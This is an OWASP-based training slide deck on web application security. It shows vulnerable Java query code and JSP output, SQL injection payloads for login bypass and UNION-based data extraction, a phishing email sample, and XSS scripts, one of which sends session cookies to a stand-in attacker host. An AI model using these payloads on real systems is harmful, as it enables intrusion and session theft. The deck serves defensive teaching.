Copyright (c) BjΓΆrn Kimminich / @bkimminich
“Nobody would bother to hack us.”
“Our network firewall will keep us safe.”
“We have tests for all our use cases.”
“We will add security to the system later.”
“What's the worst that could happen?”
A flaw or weakness in system security procedures, design, implementation, or internal controls that could [β¦] result in a security breach or a violation of the system's security policy.
A piece ofΒ software, a chunk of data, or a sequence of commands that takes advantage of a bugΒ or vulnerability to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized).
You go to court and write your name as "Michael, you are now free to go".
The judge then says "Calling Michael, you are now free to go" and the bailiffs let you go, because hey, the judge said so.
String query = "SELECT id FROM users " +
"WHERE name = '" + req.getParameter("username") + "'" +
"AND password = '" + req.getParameter("password") + "'";
Generates queries like this:
SELECT id FROM users WHERE name = 'bjoern' AND password = 'secret'
Disabling password check for a known username:
SELECT id FROM users WHERE name = 'bjoern'--' AND password = '?'
Logging in without even knowing a username:
SELECT id FROM users WHERE name = '' or 1=1--' AND password = '?'
String query =
"SELECT * FROM books " +
"WHERE title LIKE '%" + req.getParameter("query") + "%'";
Generates queries like this:
SELECT * FROM books WHERE title LIKE '%tangled web%'
SELECT * FROM books WHERE title LIKE '%'
UNION SELECT * FROM users--%'
β β β Probing for right number of result set columns:
SELECT * FROM books WHERE title LIKE '%'
UNION SELECT 1 FROM users--%'
SELECT * FROM books WHERE title LIKE '%'
UNION SELECT 1,2 FROM users--%'
SELECT * FROM books WHERE title LIKE '%'
UNION SELECT 1,2,3 FROM users--%'
Using known/guessed column names to extract data:
SELECT * FROM books WHERE title LIKE '%'
UNION SELECT name,email,password FROM users--%'
Dear valued customer,
you might be intrerestred in our new special offer! We offer best quailty on the planet for the lowest price possible: Click here for special offer!
Bjorn (Chief Executive Officer)
http://bookwo.rm/titles/search?keywords=raspberry%20pi
Often the search terms are displayed above the results:
<%
String keywords = request.getParameter("keywords");
List<Book> results = titleSearchService.search(keywords.split(" "));
%>
There are <%=results.count()%> results for
your search terms <em><%=keywords%></em>
<table>
<% for (Book book : results) { %>
// render result as table rows
<% } %>
</table>
Probing for XSS Vulnerability
<script>alert(1)</script>
Stealing User Session
<script>
new Image().src="http://my.evil-si.te/hijack.php?c="
+encodeURI(document.cookie);
</script>
Site Defacement
<script>
document.body.background="http://my.evil-si.te/image.jpg";
</script>
http
connection1Serve a HSTS header from your site to protect against protocol downgrade attacks. Also consider applying to have your domain included in the HSTS preload list of Chromium.
2 Best avoid to store credentials at all. If you must, use only brute-force resistant algorithms for password hashing, preferrably Argon2 the winner of the Password Hashing Competition.
How could we escalate our privileges here?
http://logistics-worldwi.de/showShipment?id=40643108
http://my-universi.ty/api/students/6503/exams/view
http://document-warehou.se/landingpage?content=index.html
“Security by obscurity”
Presentation created with reveal.js
The HTML Presentation FrameworkBased on free material provided by OWASP
The Open Web Application Security ProjectBackground image based on Digital Shodan
by sephiroth-kmfdmCopyright (c) BjΓΆrn Kimminich / @bkimminich
This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.